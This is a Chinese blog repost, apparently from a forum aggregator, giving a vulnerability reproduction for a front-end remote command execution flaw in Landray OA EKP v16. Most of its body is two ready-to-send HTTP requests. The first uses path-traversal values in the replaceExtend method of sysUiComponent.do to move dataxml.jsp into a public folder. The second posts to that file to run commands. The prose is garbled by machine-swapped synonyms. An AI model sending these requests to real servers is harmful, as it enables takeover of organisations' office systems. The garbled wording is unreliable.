[毛病复现]蓝凌OA共同文件移动实现前台RCE
假如以为该文章有资助的,贫苦师傅们可以搜索下微信公众号:良月安全。点个关注,感谢师傅们的支持。原文有很多师傅已经搬过了,我这里放一个链接:某凌 EKP 前台远程命令执行毛病分析 - 先知社区 (aliyun.com)
简朴来说就是通过sysUiComponent接口的replaceExtend把后台命令执行所在文件dataxml.jsp移动至到前台从而实现前台命令执行。
毛病简介
蓝凌OA是由深圳市蓝凌软件股份有限公司开发,是一款针对中小企业的移动化智能办公产物 ,融合了钉钉数字化能力与蓝凌多年OA产物与服务经验,能全面满足企业日常办公在线、企业文化在线、客户管理在线、人事服务在线、行政务服务在线等需求。攻击者可从前台RCE获取服务器权限。
影响版本:v16
毛病复现
文件移动poc
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host: xx.xx.xx.xx
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 401
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
Origin: http://www.baidu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Requested-With: XMLHttpRequest
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="method"
replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="extendId"
../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="folderName"
../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51-- https://i-blog.csdnimg.cn/direct/955b0752efdb493d9d394162ec4ae9c3.png
dataxml.jsp利用就是老样子
POST /resource/help/kms/knowledge/dataxml.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Content-Length: 17392
Content-Type: application/x-www-form-urlencoded
s_bean=ruleFormulaValidate&script=shell&returnType=int&modelName=test https://i-blog.csdnimg.cn/direct/ef091ea8417441a294828c1cc4c0ec14.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]